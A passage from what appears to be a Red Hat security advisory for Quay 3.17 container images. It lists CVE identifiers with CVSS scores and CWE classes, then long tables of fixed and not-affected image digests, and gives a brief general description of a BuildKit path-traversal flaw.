Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64		—

Threats

Impact Important

CVE-2026-32590

7.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CWE-502 - Deserialization of Untrusted Data

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix

Known not affected 27 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64		—

Threats

Impact Moderate

CVE-2026-33186

9.1 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-551 - Incorrect Behavior Order: Authorization Before Parsing and Canonicalization

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix Workaround

Known not affected 27 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64	—	Workaround

Threats

Impact Important

CVE-2026-33747

A flaw was found in BuildKit, a toolkit for converting source code to build artifacts. An untrusted BuildKit frontend can be leveraged to craft a malicious API message, allowing files to be written outside of the designated BuildKit state directory. This vulnerability, which is a form of arbitrary file write, could enable an attacker to execute unauthorized code or escalate their privileges on the system. This issue arises when custom BuildKit frontends are used with specific configuration options.

8.2 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix Workaround

Known not affected 27 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64	—	Workaround

Threats

Impact Moderate

CVE-2026-33894

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE-347 - Improper Verification of Cryptographic Signature

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix Workaround

Known not affected 27 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64	—	Workaround
